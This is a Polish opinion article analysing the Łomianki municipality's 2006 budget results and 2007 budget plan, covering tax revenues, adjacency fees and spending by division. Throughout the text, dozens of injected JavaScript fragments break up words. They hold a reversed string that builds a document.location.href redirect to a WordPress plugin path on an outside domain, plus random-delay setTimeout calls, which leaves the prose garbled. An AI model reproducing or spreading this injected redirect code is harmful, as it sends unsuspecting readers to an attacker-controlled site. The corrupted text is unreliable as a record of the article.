Mamy już wykonanie budżetu 2006 roku, ale od jego oceny ważniejszye jest porównanie z budżetem na 2007 rok i wyciągnięcie wniosków. Przyszłość jest istoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}totna, ale czas narzekań na poprzednią władzę gminną się skończył wraz z wyborami, a niedługo nadejdzie czas oceny realizacji obietnic przedwyborczych.
Wszystko zaczyna się i kończy na pieniądzach. Budżet stanowi o sposobie realizacji programu wyborczego i zapowiedzianych priorytetach. Nowy budżet układany jest na podstawie wyników poprzedniego roku i zestawień „koncertu życzeń” poszczególnych wydziałów i jednostek organizacyjnych. Jednakże, jeśli chce się wprowadzać zapowiadane oszczędności, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to należy mieć odwagę nie uwzględniać w prognozowanych kwotach nie najpilniejszych ubiegłorocznych wydatków lub wydatków niepowtarzalnych (można toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nazwać analizą celowości) i umieć odmawiać nowym prośbom bez obawy, że narazi się na niepopularność. Wyborcy i tak na końcu ocenią nową władzę po witoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}docznych efektach w porównaniu z obietnicami.
DOCHODY
W 2006 r. przy planowanych 53,3 mln zł faktyczne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochody wyniosły 56,1 mln zł, czyli wzrosły o 2,8 mln zł. Wzrost ten nastąpił głównie dzięki większym wpływom z podatków i opłat (2,5 mln zł, w tym udział gminy w PIT i CIT 1,3 mln zł). Najpoważniejsze pozycje uzyskanych toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochodów (w nawiasach wzrost w stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosunku toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do planu) toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to:
• toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochody z podatków i opłat realizowanych przez gminę – 9,4 mln zł (+ 0,1 mln zł),
• udział gminy w podatku PIT – 26,9 mln zł (+ 1,0 mln zł),
• toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochody realizowane przez US – 4,6 mln zł (+ 1,2 mln zł),
• otrzymane toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotacje celowe – 3,0 mln zł,
• subwencja oświatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towa – 6,0 mln zł.
Kredytu „termoizolacyjnego” na ocieplenie szkół nie uzyskano, pomimo że zapłacono 27 tys. zł za audyt energetyczny warunkujący jego otrzymanie.
W roku 2007, po 3 korektach budżetu, przewiduje się toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochody na poziomie 59,5 mln zł, czyli większe o 3,4 mln zł w porównaniu z rokiem 2006.
Poszczególne, najważniejsze, pozycje (w nawiasach wzrost w stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosunku toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do wykonania 2006 r.) przedstawiają się następująco:
• toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochody z podatków i opłat realizowanych przez gminę – 9,3 mln zł (- 0,1 mln zł),
• udział gminy w podatku PIT – 31,8 mln zł (+ 4,9 mln zł),
• toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochody realizowane przez US – 4,2 mln zł (- 0,4 mln zł),
• przewidywane toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotacje celowe – 3,7 mln zł (+ 0,7 mln zł),
• subwencja oświatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towa – 6,5 mln zł (+ 0,5 mln zł).
Oznacza toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to z jednej strony wielki optymizm, jeśli chodzi o wzrost toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochodów z PIT (aż o 4,2 mln zł), a z drugiej zmniejszenie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochodów w innych działach o 2,2 mln zł.
Zmniejszenie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochodów toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wynik:
– zmniejszenia toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochodów z majątku gminnego o 0,3 mln zł (kwoty uzyskane ze zbycia praw majątkowych),
– zmniejszenia pozostałych toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochodów własnych o 1,5 mln zł (w tym 0,3 mln zł wynoszą spadki, zapisy i darowizny oraz 1,2 mln zł – wpływy różne),
– zmniejszenia toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochodów z udziału w CIT o 0,4 mln zł (podatek toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowy od osób prawnych). O ile pierwsze 2 pozycje zmniejszeń mogą mieć uzasadnienie, o tyle zmniejszenie wpływów z CIT jest chyba nieporozumieniem. Przy tak dużej liczbie firm w Łomiankach uzyskanie w 2006 r. wpływu z tego tytułu tylko w wysokości 1,5 mln zł było (moim zdaniem) zdecytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowanie za niskie, a dalsze obniżanie jest pomyłką.
Reasumując, wykonanie budżetu w 2006 r. i plan na 2007 r. potwierdzają oczywistą prawdę, że należy szukać toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodatkowych źródeł toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochodów. Jest toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jednak trudniejsze i znacznie bardziej czasochłonne, niż wprowadzanie oszczędności.
UMiG ma mały wpływ na zwiększenie wpływów z udziału w podatku toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowym pochodzącym z deklaracji podatkowej od osób fizycznych PIT. Osoby nie zameltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowane w Łomiankach, a mieszkające tutaj i nie podające w deklaracjach podatkowych i druku NIP-3, że mieszkają w Łomiankach, mogą przecież nie czytać apeli drukowanych w Gazecie Łomiankowskiej czy Naszych Łomiankach. Wobec nich powinno się zastoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosować bardziej konkretne działania, np. po opracowaniu wykazu takich osób wystoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosowanie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do nich listu od burmistrza wyjaśniającego problem.
Sprawa udziału gminy w podatku toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowym od osób prawnych CIT jest jeszcze trudniejsza, jeżeli toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotyczy firm, których główne biuro jest zarejestrowane poza Łomiankami. Istnieją jednak przepisy, które regulują takie sytuacje. W takich przypadkach o procentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towym udziale gminy w CIT decyduje procent liczby zatrudnionych w danej gminie w stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosunku toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do całości zatrudnienia w firmie-matce. Trzeba jednak najpierw zewidencjonować takie firmy i rozpocząć korespondencję z ich dyrekcjami i ich Urzędami Skarbowymi.
Kolejnym źródłem toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochodu jest podatek od nieruchomości. Płacony jest on na podstawie złożonych deklaracji o powierzchni zajmowanych lokali, których nikt jednak nie sprawdza w naturze. Można przypuszczać, że wiele firm (podatek od powierzchni zajmowanej na działalność gospodarczą jest znacznie wyższy) takiego podatku nie płaci lub płaci w zaniżonej wysokości. Również wiele osób mieszka w nieodebranych przez nadzór butoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowlany toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domach i też nie płaci tego podatku. Uważam, że nie ma potrzeby podnosić stawki podatku. Wystarczy zacząć egzekwować należności.
Źródłem toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dochodów są też opłaty adiacenckie lub opłaty partycypacyjne. Na przykład z opłat partycypacyjnych Komitet Społeczny Wod.-Kan. działając jako „agent” UMiG uzyskał około 5 mln zł, które wykorzystano na butoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowę sieci lub wpłacono toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do kasy Urzędu. Obecne władze uchwaliły stawkę „0” na opłaty adiacenckie, nic nie proponując w zamian. Umowa partycypacyjna jest bowiem toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobrowolna i jeżeli ktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toś jej nie podpisze, nie powoduje toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to żadnej prawnej sankcji. Nie można również wysuwać jakichkolwiek roszczeń wobec właścicieli działek, obok których będzie przechodzić sieć wod.-kan. lub będzie wybutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowana droga.
Myślę, że stawkę „0” uchwalono ze względów politycznych. Komitet wyborczy „Potrzeba Zmian” i Komitet Obywatelski Łomianek postulowały przed wyborami zniesienie opłat adiacenckich z tą różnicą, że Komitet Obywatelski chciał znieść obowiązek opłat adiacenckich i alternatywnie przywrócić opłaty partycypacyjne. Zniesienie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie oznacza stawki „0”. Można było uchwalić ich istnienie równoległe – albo jedno, albo drugie. Moim zdaniem powinno się wrócić toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do tej sprawy.
Następną pozycją są ulgi w formie umorzenia zaległości podatkowych i odsetek. W 2006 r. wyniosły one 4,1 mln zł. Należałoby chyba przyjrzeć się w przyszłości zasadności takich ulg.
WYDATKI
Wydatki ogółem w 2006 r. były planowane w wysokości 54,2 mln zł, a wyniosły 49,3 mln zł, w tym wydatki majątkowe przy planowanych 9,9 mln zł wyniosły faktycznie 8,3 mln zł. W tych 8,3 mln zł mieści się spłata 5,7 mln zł za ICDS. Pozostałe 2,6 mln zł toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to: autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobus – 0,6 mln zł, drogi i chodniki – 0,9 mln zł, termoizolacja szkół – 0,5 mln zł, oświetlenie ulic – 0,4 mln zł. Niewykonanie 1,6 mln zł wydatków majątkowych toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to niezrealizowanie planu inwestycyjnego (w tym nietoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopłata 1 mln zł rocznej raty spłaty za ICDS).
Plan na 2007 r. po 3 korektach zakłada wydatki 60,8 mln zł, tj. o 11,5 mln zł wyższe, w tym wydatki majątkowe – 12,5 mln zł. W nich jest zawarte 6,2 mln zł spłaty za ICDS. Pozostałe 6,3 mln zł toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nakłady na inwestycje, w tym: 3,3 mln zł na drogi, 0,8 mln zł – zakup autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobusu i samochodu pożarniczego i 1,6 mln zł – termoizolację szkół podstawowych, która wiąże się z uzyskaniem „kredytu termoizolacyjnego” w wysokości 1,5 mln zł. Jest on korzystny o tyle, że po realizacji zadania zgodnie z operatem energetycznym, 25% kredytu zostaje umorzone. Mogą być jednak kłopoty, po-toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobnie jak w 2006 r., gdy go nie uzyskano.
Na pozytywną ocenę zasługuje rozpoczęcie prac przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towawczych toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do butoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowy budynku komunalnego dla 30 rodzin przy ul. Fabrycznej i przebutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowy ul. Warszawskiej!!!
Wykonanie wydatków w 2006 r. w poszczególnych działach i plan na 2007 r. (w nawiasach plan 2007 r. po 3 korektach) przedstawiają się następująco:
Dział 010 – Rolnictwo i łowiectwo
2006 r. – 3 tys. zł, 2007 r. – 2,4 tys. zł (402,4 tys. zł!!!). W 2005 r. udział gminy w wykonaniu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dokumentacji na wzmocnienie wałów mógł wynieść 150 tys. zł, ale takiej decyzji nie podjętoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, teraz będzie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to kosztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tować 400 tys. zł!
Dział 600 – Transport i łączność
2006 r. – 4,9 mln zł, 2007 r. – 7,2 mln zł (7,2 mln zł).
Dział 700 – Gospodarka mieszkaniowa
– w tym gospodarka gruntami i nieruchomościami, 2006 r. – 489 tys. zł, 2007 r. – 1,1 mln zł (1,4 mln zł).
Dział 710 – Działalność usługowa
– w tym planowanie przestrzenne i geodezja,
2006 r. – 411 tys. zł, 2007 r. – 73 tys. zł (336 tys. zł).
Dział 720 – Informatyka
2006 r. – 370 tys. zł, 2007 r. – 322 tys. zł (322 tys. zł).
Dział 750 – Administracja publiczna
2006 r. – 8,5 mln zł, 2007 r. – 8,9 mln zł (9,7 mln zł), w tym m.in.:
rozdział 75023 – UMiG, 2006 r. – 6,9 mln zł, 2007 r. – 7,4 mln zł (8,1 mln),
rozdział 75095 – Gminne Centrum informacji,
2006 r. – 664 tys. zł, 2007 r. – 641 tys. zł (657 tys. zł).
Dział 751 – Urzędy naczelnych organów władzy państwowej
2006 r. – 37 tys. zł, 2007 r. – 3 tys. zł (3 tys. zł).
Dział 752 – Obrona narotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowa
2006 r. – 2 tys. zł, 2007 r. – 2 tys. zł (2 tys. zł).
Dział 754 – Bezpieczeństwo i ochrona ppoż.
– w tym Policja, Straż Pożarna, Obrona cywilna i Straż Miejska, 2006 r. – 1,4 mln zł, 2007 r. – 1,5 mln zł (1,6 mln).
Dział 756 – Dochody od osób prawnych i fizycznych (koszt poboru podatków),
2006 r. – 83 tys. zł, 2007 r. – 106 tys. zł (106 tys. zł).
Dział 757 – Obsługa długu publicznego (spłaty odsetek za kredyty),
2006 r. – 1 mln zł, 20007 r. – 1 mln zł (1 mln zł).
Dział 758 – Różne rozliczenia
2006 r. – 1,2 mln zł, 2007 r. – 1,7 mln zł (1,4 mln zł).
Dział 801 – Oświata i wychowanie
2006 r. – 18,7 mln zł, 2007 r. – 21,2 mln zł (22,2 mln zł).
Dział 851 – Ochrona zdrowia
2006 r. – 276 tys. zł, 2007 r. – 322 tys. zł (322 tys. zł).
Dział 852 – Pomoc społeczna
2006 r. – 3,4 mln zł, 2007 r. – 4,5 mln zł (4,5 mln zł).
Dział 854 – Edukacyjna opieka wychowawcza
2006 r. – 433 tys. zł, 2007 r. – 699 tys. zł (682 tys. zł).
Dział 900 – Gospodarka komunalna i ochrona śrotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowiska
2006 r. – 6,6 mln zł, 2007 r. – 7,9 mln zł (7,9 mln zł), w tym m. in.:
rozdział 90001 – Gospodarka ściekowa i ochrona wód, 2006 r. – 1,7 mln zł, 2007 r. – 2,7 mln zł (2,7 mln zł);
rozdział 90095 – ICDS, 2006 r. – 3 mln zł, 2007 r. – 3,3 mln zł (3,2 mln zł).
Dział 921 – Kultura i ochrona dziedzictwa narotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowego
2006 r. – 1,3 mln zł, 2007 r. – 1,3 mln zł (1,4 mln).
Dział 926 – Kultura fizyczna i sport
2006 r. – 157 tys. zł, 2007 – 160 tys. zł (188 tys. zł).
